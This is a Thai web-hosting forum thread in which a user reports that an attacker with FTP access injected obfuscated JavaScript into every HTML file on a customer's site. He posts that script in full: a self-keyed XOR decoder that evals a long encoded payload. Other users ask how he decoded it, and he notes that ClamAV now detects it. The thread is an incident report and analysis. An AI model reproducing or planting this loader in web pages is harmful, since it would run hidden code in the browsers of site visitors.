ถอดรหัส javascript ที่แทรกมาในหน้า html

Jimmy · October 22, 2008, 1:56pm

ด้วยความสงสัย เพราะว่าสังเกตจากการใช้งานของลุกค้า มีการ ftp ที่เข้ามาจากอาเจนตินา ทั้งๆที่ตั้งรหัสผ่านให้แบบคิดว่านั่งแกะก็คงอีกนาน ไปค้นเจอพบว่าเข้ามาแทรกรหัส javascript ไว้ท้ายไฟล์ทุกไฟล์ที่เป็น html ด้วยความอยากรู้อยากเห็น ก็เลยหาเรื่องปวดหัวเล่นๆ


function pCiy7(uAPz){function mTFe(dO0){var pV2dF=0,wPl,zd6Ls=dO0.length;for(wPl=0;wPl<zd6Ls;wPl++)pV2dF+=dO0.charCodeAt(wPl)*zd6Ls;return new String(pV2dF)}uAPz=unescape(uAPz);var z8lK=eval('a+rigPuPmie+nPt0si.PcPaPlPl0eieZ'.replace(/[i\+Z0P]/g, '')).toString().replace(/[^@a-z0-9A-Z_.,-]/g,''),drbO4=mTFe(z8lK),bbFxum=new String(),rt0P=0;cClD=0;for(var cQiyHeg=0;cQiyHeg<uAPz.length;cQiyHeg++){bbFxum+=String.fromCharCode(uAPz.charCodeAt(cQiyHeg)^(z8lK.charCodeAt(rt0P)^drbO4.charCodeAt(cClD)));rt0P++;cClD++;if(rt0P>=z8lK.length)rt0P=0;if(cClD>=drbO4.length)cClD=0;}eval(bbFxum);bbFxum='';return;}pCiy7('%32%30%38%33%38%39%32%34%62%04%36%62%26%37%0e%5f%3f%31%63%2d%29%22%2f%34%28%24%1c%10%7d%60%5d%7f%37%34%3e%00%01%64%3d%1b%67%3c%75%43%32%60%26%33%70%15%24%39%5f%67%7d%35%32%72%7f%31%31%33%28%23%6c%1b%22%62%3d%49%3a%73%76%68%11%37%6f%2d%3f%30%01%2a%75%4e%7c%12%2c%69%34%2c%0d%28%16%33%7e%3f%16%33%6f%27%35%37%33%2a%57%6d%2d%33%38%18%29%37%39%7d%66%40%67%6b%63%6c%61%70%5e%31%6c%4f%6e%4e%42%2e%22%3e%28%27%34%3b%36%7b%2e%1d%07%28%2d%30%60%77%20%31%12%31%21%75%75%71%68%67%7d%49%6c%44%3a%2a%3e%3c%18%28%2a%31%3a%72%1d%35%41%73%40%63%42%39%70%26%38%2e%0d%69%7d%77%63%3b%77%2e%38%1a%25%54%3b%20%66%7e%28%3c%49%6d%71%7a%2b%72%7b%23%23%12%35%3c%3f%0f%06%27%76%24%6f%3e%3b%58%79%1b%03%7d%60%77%30%7b%36%79%3b%24%16%75%75%01%49%60%7e%24%37%45%33%6b%76%43%37%77%7b%6e%20%7a%20%75%01%6f%2e%63%3a%73%68%3d%1a%61%1a%12%15%1e%2c%36%20%27%33%34%37%7d%4d%2f%2e%08%31%35%6b%3f%4b%72%10%24%20%2c%0c%5e%3e%60%41%73%3a%71%7f%6a%7d%7e%4f%36%7c%5c%7a%65%36%39%06%60%3b%3f%19%6d%29%60%6c%6c%7f%69%26%6d%36%5c%71%78%25%5b%6a%3e%79%32%06%02%31%69%29%79%1e%27%05%37%72%30%15%22%3e%17%73%04%11%22%37%6d%78%39%17%7a%34%36%71%62%5b%38%78%39%1c%29%2d%39%6a%4d%7a%73%76%4d%25%2c%23%39%27%37%09%32%7c%33%48%3d%7d%03%35%03%22%77%25%4b%36%10%3d%14%38%71%23%2e%2d%47%6e%62%3a%01%68%39%3b%32%7f%7d%70%2d%33%6a%01%74%38%3a%35%52%77%0b%3f%24%72%5d%78%7f%37%22%72%36%20%29%3e%1b%3a%09%4b%3b%3d%26%35%37%3c%17%2e%6d%7c%78%21%09%2b%33%7f%31%60%65%71%62%38%07%2e%0b%2d%6e%71%12%2f%00%05%1d%38%4b%21%37%07%67%69%01%0a%77%19%34%19%33%1b%17%31%26%01%1a%5f%23%7a%3b%0c%5f%57%33%5d%6b%51%29%41%3a%5b%1f%71%2b%40%07%60%29%61%3e%38%04%2e%0a%2d%72%33%0b%25%0c%42%13%7b%6d%1a%7c%2b%05%39%33%17%63%41%77%6c%10%65%24%12%36%14%6c%34%78%01%0d%17%3f%02%19%0b%5c%1b%68%0f%73%62%7a%23%51%6a%36%35%2e%3e%65%3b%3f%23%01%19%26%27%35%09%01%0e%4e%23%7c%5c%10%54%42%76%63%6a%18%64%7c%3a%62%31%2f%0b%09%23%69%3e%60%2d%46%6a%29%61%01%7c%6b%37%0c%38%67%1e%1d%5c%7f%79%7b%24%06%3c%65%20%3e%79%48%74%38%17%03%6d%35%78%5d%72%3d%71%43%3b%61%7e%7b%20%20%22%7c%20%18%63%12%7f%70%2b%29%32%04%33%2f%34%33%2b%2c%2f%7f%2d%2c%3c%3e%75%50%68%76%66%77%67%63%0d%71%40%18%35%27%7a%7a%77%79%39%35%35%57%25%65%11%1c%36%3a%69%34%5b%7a%73%20%10%23%24%28%3b%33%21%1e%68%31%29%37%2b%7a%62%6a%3e%0d%6a%0a%0f%23%11%4c%38%27%7e%2f%65%18%39%31%34%63%1e%0c%26%46%65%46%7c%63%08%30%2f%2a%18%0a%2d%32%71%0e%13%08%30%08%0d%4b%32%14%5f%31%73%7b%77%55%63%6e%26%4b%6b%77%6b%75%23%7c%6e%2e%21%30%41%25%01%7c%4b%60%0e%73%05%1d%3a%3e%4e%3d%08%34%36%49%1f%73%73%00%29%2a%0f%3c%28%1d%75%7b%19%43%06%4f%4e%25%0d%7d%2d%56%7d%77%70%58%65%3c%38%61%0b%23%6e%21%12%73%55%35%35%3e%29%16%7f%23%35%11%35%79%12%33%13%2a%25%6c%2c%36%1c%39%50%7a%2a%23%2f%77%4c%29%6f%30%18%7e%3b%07%3d%3b%39%3e%63%76%7f%19%2e%3e%3b%24%3d%27%17%3d%25%07%25%4b%36%6f%77%3c%20%2a%33%24%12%3a%18%2c%7e%3d%2f%3e%28%7b%10%20%2f%60%3e%3e%1d%34%2a%3c%2e%21%62%2a%25%34%35%35%35%3c%22%74%3f%38%31%03%60%69%7d%23%0d%1c%3a%3c%67%7c%33%33%25%26%7e%72%41%4c%72%78%50%22%6c%7d%24%2c%06%21%61%42%22%3f%62%40%28%63%62%39%68%10%61%69%4a%23%31%20%39%3e%30%22%39%3b%32%2f%62%4d%7e%3f%6f%17%3c%2a%25%2c%19%26%3b%31%35%27%00%55%22%04%35%12%6f%3f%78%7c%69%62%5c%7b%75%7c%58%60%21%0c%3c%67%2e%6a%0e%2b%21%36%29%66%62%78%07%0f%24%4e%36%71%7c%6e%7b%69%39%2d%70%52%63%5f%4b%60%35%3b%2d%2c%3a%3b%27%71%6f%5e%34%67%65%77%6c%69%24%7b%5a%76%6e%73%7e%77%6e%7b%7f%48%6d%1d%37%34%24%70%0f%22%7c%18%3a%74%06%00%1c%20%01%3b%05%70%2b%75%7a%76%40%39%62%71%69%7c%2d%38%34%23%46%6c%0d%24%60%3d%67%76%15%28%29%2a%78%24%77%3f%3f%7f%23%7d%3a%3a%0a%3d%7e%2a%7b%54%6f%01%61%02%01%76%7b%79%7f%25%34%3b%35%38%1e%70%3c%08%10%74%61%77%2c%1e%60%24%28%11%6a%60%77%3a%32%27%1e%20%25%33%28%79%77%2e%23%62%0b%61%7f%1a%3a%13%6d%27%12%20%6c%25%22%39%1a%7e%28%13%38%3c%61%35%27%31%26%19%77%7c%6d%55%55%64%3c%73%77%2a%37%2e%23%74%00%32%24%13%34%31%0c%3a%18%39%22%74%4b%7a%77%70%71%62%35%6d%37%70%36%15%35%3e%29%16%19%36%30%29%49%43%29%7b%3d%3f%31%29%12%3c%71%79%11%28%28%1c%61%6a%18%27%2a%3d%2d%38%18%74%7f%3b%37%66%57%35%39%3e%18%2d%2f%11%69%05%23%23%6a%4e%71%26%2d%30%21%66%1e%3c%34%39%44%23%34%00%7e%03%2d%6f%21%52%3e%14%36%1b%7f%3c%24%3e%76%05%24%64%7c%51%2d');

แกะไปแกะมาก็ได้ออกมาเป็น

SiamDhost.Com · October 22, 2008, 3:12pm

ถอดได้ไงอ่ะนั่ัน

ICOM · October 22, 2008, 4:04pm

ขอบคุณ คุณ Jimmy ครับ

poomjit · October 22, 2008, 11:50pm

ตามมาเป็นแฟนคลับ ฮี่ๆ

ninep · October 23, 2008, 11:07am

ไม่บอกวิธีด้วยล่ะท่าน… :smash:

Jimmy · October 23, 2008, 11:25am

วิธีถอดรหัสเขียนไว้ให้แล้วครับ

ninep · October 23, 2008, 1:15pm

อ้อ ขอบคุณครับ พอดีไม่เห็น หน้าเว็บย๊าววยาววว

Jimmy · October 24, 2008, 1:37am

ล่าสุด ClamAV update signature ให้แล้ว

system · May 16, 2016, 7:20am